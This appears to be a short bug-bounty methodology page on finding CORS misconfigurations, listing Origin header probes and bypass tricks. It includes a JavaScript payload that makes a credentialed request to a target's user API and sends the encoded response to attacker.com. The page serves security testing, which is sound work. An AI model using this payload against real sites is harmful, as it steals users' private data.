Misconfigured CORS allows attacker-controlled sites to make credentialed requests to the target.

Add an Origin header to every interesting request:

Origin: https://attacker.com
Origin: https://anythinghere-target.com
Origin: null

Check the response for:

Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true

Both headers together = exploitable.

• Substring match – if they check if (strpos($origin, “target.com”)), try https://attacker.com?x=target.com
• Suffix match – try https://attackertarget.com
• null origin – some sites allow null origin (sandbox iframes)
• Subdomain – find any XSS on any subdomain of the target; use it as the origin

<script>
fetch('https://target.com/api/user', {credentials: 'include'})
  .then(r => r.text())
  .then(d => fetch('https://attacker.com/?d=' + btoa(d)));
</script>

Even if an endpoint with CORS misconfiguration seems harmless, the same configuration pattern is often reused across the app. A read on a harmless endpoint proves the bypass – then look for it on sensitive API calls.

• XSS Testing
• TBHM Auth & Session
• Methodology Index